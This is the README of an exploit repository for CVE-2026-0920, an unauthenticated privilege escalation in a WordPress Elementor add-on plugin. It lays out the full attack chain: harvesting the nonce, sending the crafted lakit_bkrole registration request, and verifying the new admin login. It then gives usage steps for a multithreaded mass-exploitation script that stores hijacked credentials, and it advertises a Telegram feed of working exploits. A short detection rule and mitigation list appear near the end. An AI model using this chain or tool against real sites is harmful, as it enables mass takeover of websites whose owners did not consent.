README.md
Rendering markdown...
# CVE-2026-0920-
LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter
<div align="center">
```
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\ \ / / __|_|_ ) \_ )/ / ___ / \/ _ \_ ) \
| (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
\___| \_/ |___| /___\__/___\___/ \__/ /_//___\__/
```
<br>
[](https://t.me/KNxploited)
[](https://www.cve.org/CVERecord?id=CVE-2026-0920)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-0920)
[](https://python.org)
[](#%EF%B8%8F-disclaimer)
<br>
> 📡 **The exploit drops here first.**
> Follow **[@KNxploited](https://t.me/KNxploited)** on Telegram — your elite feed for freshly disclosed CVEs, working PoCs, and precision security research. Updated relentlessly. Built for those who stay ahead.
</div>
---
## 🧠 Overview
**CVE-2026-0920** is a **CVSS 9.8 Critical** vulnerability discovered in the **LA-Studio Element Kit for Elementor** WordPress plugin.
The flaw resides in the `ajax_register_handle()` function, which processes unauthenticated user registrations via AJAX. The function fails to enforce any restriction on the `lakit_bkrole` parameter — allowing a completely unauthenticated attacker to **self-assign the `administrator` role** during registration, achieving **full WordPress admin takeover** in a single request.
| Field | Details |
|------------------------|------------------------------------------------------|
| **CVE ID** | CVE-2026-0920 |
| **Plugin** | LA-Studio Element Kit for Elementor |
| **Slug** | `lakit` / `la-studio-element-kit-for-elementor` |
| **Affected Versions** | All versions up to and including **1.5.6.3** |
| **Vulnerability Type** | Unauthenticated Privilege Escalation / Admin Creation|
| **Attack Vector** | Network — No Authentication Required |
| **CVSS 3.1 Score** | **9.8 CRITICAL** |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Impact** | Full WordPress Administrator Takeover |
| **Researcher** | Nxploited |
---
## 💀 Vulnerability Deep Dive
The root cause is a missing role capability check inside the plugin's AJAX registration handler:
```php
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);
public function ajax_register_handle() {
$actions = json_decode(stripslashes($_POST['actions']), true);
foreach ($actions as $req) {
if ($req['action'] === 'register') {
$data = $req['data'];
$user_data = [
'user_login' => $data['username'],
'user_pass' => $data['password'],
'user_email' => $data['email'],
'role' => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
];
// No validation of $data['lakit_bkrole'] against allowed roles
wp_insert_user($user_data); // Administrator created silently
}
}
}
```
**Why this is critical:**
- `wp_ajax_nopriv_*` = accessible by **anyone with zero authentication**
- `lakit_bkrole` accepts any WordPress role string — including `administrator`
- A single POST request creates a fully privileged admin account
- The nonce required is publicly exposed in the site's front-end HTML/JS
- No rate limiting, no CAPTCHA enforcement by default, no email verification required
---
## ⚔️ Exploit Chain
```
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)
Search HTML/JS for:
"ajaxNonce": "<value>" ← Inline JSON config
ajaxNonce: '<value>' ← JS variable
data-ajaxnonce="<value>" ← HTML attribute
Nonce is publicly accessible — no login required.
↓
ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = lakit_ajax
_nonce = <extracted nonce>
actions = {
"req1": {
"action": "register",
"data": {
"email": "[email protected]",
"password": "adminSA",
"username": "Nx_admin",
"lakit_field_log": "yes", ← use supplied username
"lakit_field_pwd": "yes", ← use supplied password
"lakit_field_cpwd": "no", ← skip password confirm
"lakit_bkrole": "1", ← trigger admin role injection
"lakit_recaptcha_response": ""
}
}
}
↓
Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
log = Nx_admin
pwd = adminSA
↓
Session cookies obtained → GET /wp-admin/plugin-install.php
↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
```
---
## ⚙️ Requirements
```bash
pip install requests colorama
```
| Dependency | Purpose |
|--------------|------------------------------------------------|
| `requests` | HTTP requests, session handling, cookie management |
| `colorama` | Colored terminal output on all platforms |
| `threading` | Concurrent multi-target processing |
| `re` | Regex-based nonce extraction from HTML/JS |
> Python **3.10+** recommended (uses `str | None` union type hints).
---
## 📂 File Structure
```
CVE-2026-0920/
├── CVE-2026-0920.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: pwned targets + credentials
```
---
## 🚀 Usage
### Step 1 — Configure Credentials *(Optional)*
Open `CVE-2026-0920.py` and edit the constants at the top to set your desired admin account details:
```python
ADMIN_EMAIL = "[email protected]" # Email for the new admin account
ADMIN_PASSWORD = "adminSA" # Password for the new admin account
ADMIN_USERNAME = "Nx_admin" # Username for the new admin account
```
---
### Step 2 — Prepare Targets
Create `list.txt` with one target URL per line:
```
https://target1.com
https://target2.com
http://target3.com
```
> URLs without a scheme are automatically prefixed with `https://`.
---
### Step 3 — Run the Exploit
```bash
python CVE-2026-0920.py
```
You will be prompted:
```
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
```
---
### Step 4 — Monitor Live Output
The script produces real-time, color-coded terminal output:
```
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
============================================================
[ SUCCESS BLOCK ]
Site : https://target.com
Result : SUCCESS
AJAX OK : YES
FULL ADMIN : YES (login + plugin install access)
============================================================
```
| Color | Meaning |
|-------------|--------------------------------------------------|
| 🔵 Cyan `[*]` | Informational — step in progress |
| 🟢 Green `[+]`| Positive signal — partial or full success |
| 🟡 Yellow `[!]`| Warning — ambiguous result, needs review |
| 🔴 Red `[-]` | Failure — target not exploitable or errored |
---
### Step 5 — Review Results
Successful exploits are written to `success_results.txt`:
```
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
```
Each line contains the full picture: target, credentials, login status, AJAX response status, and the nonce used.
---
## 🖥️ Script Parameters Reference
| Parameter | Default | Description |
|-------------------|----------------------------|----------------------------------------------|
| Targets file | `list.txt` | File containing target URLs |
| Threads | `10` (max: `50`) | Concurrent workers |
| `ADMIN_EMAIL` | `[email protected]` | Email for injected admin account |
| `ADMIN_PASSWORD` | `adminSA` | Password for injected admin account |
| `ADMIN_USERNAME` | `Nx_admin` | Username for injected admin account |
---
## 🔬 Verification Logic
The script performs **two-stage verification** to eliminate false positives:
```
Stage 1 — AJAX Response Analysis
Checks for success markers in the JSON response:
• "created successfully"
• "success":true
• "type":"success"
• "status":"success"
Stage 2 — Real Login + Plugin Install Access Test
1. POST /wp-login.php with injected credentials
2. GET /wp-admin/plugin-install.php
3. Confirm 200 response + plugin upload form present
4. Confirm no redirect back to wp-login.php
Only BOTH stages passing = TRUE SUCCESS reported
```
This eliminates false positives caused by sites that return `200 OK` on AJAX but silently fail registration.
---
## 📊 Detection Signature
The exploit generates this specific network pattern — for defenders and WAF authors:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
```
**WAF / IDS Rule (Pseudocode):**
```
IF request.method == POST
AND request.path == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "lakit_ajax"
AND request.body CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
```
---
## 🛡️ Mitigation & Remediation
If you are a **site owner, developer, or defender**, act immediately:
- ✅ **Update** LA-Studio Element Kit for Elementor to a version **above 1.5.6.3**
- ✅ **Deactivate and delete** the plugin until a confirmed patched version is installed
- ✅ **Audit** all WordPress administrator accounts — remove any unrecognized entries immediately
- ✅ **Enforce** server-side role validation — never trust user-supplied role values without a whitelist check
- ✅ **Block** unauthenticated POST requests to `admin-ajax.php` containing `lakit_bkrole` at the WAF level
- ✅ **Monitor** server and WordPress activity logs for `lakit_ajax` AJAX action calls
- ✅ **Enable** two-factor authentication on all existing admin accounts as a containment measure
- ✅ **Review** the Wordfence advisory and apply all recommended hardening steps
---
## ⚠️ Disclaimer
```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.
By downloading, executing, or modifying this script, you explicitly agree:
• You hold EXPLICIT, WRITTEN authorization from the owner of every
target system you test. No exceptions. No grey areas.
• You are operating within a formally scoped, authorized penetration
testing engagement or a controlled lab environment.
• You will NOT use this tool against any system, network, or
infrastructure without documented legal permission.
• Nxploited and all contributors bear ZERO liability for unauthorized
use, data loss, system damage, legal proceedings, or criminal
prosecution arising from the use of this tool.
Unauthorized use of this exploit constitutes a criminal offense under:
— Computer Fraud and Abuse Act (CFAA), USA
— Computer Misuse Act (CMA), UK
— EU Directive 2013/40/EU on Attacks Against Information Systems
— Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
— And all equivalent national and international cybercrime legislation.
USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```
---
## 👤 Author
<div align="center">
| | |
|---------------|-----------------------------------------------------------|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
<br>
> 🔔 **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> Fresh CVEs. Working exploits. Deep-dive vulnerability research.
> First to know. First to act. Don't be last.
</div>
---
<div align="center">
<sub>Engineered with precision by <strong>Nxploited</strong> · For authorized security research only · CVSS 9.8 Critical</sub>
</div>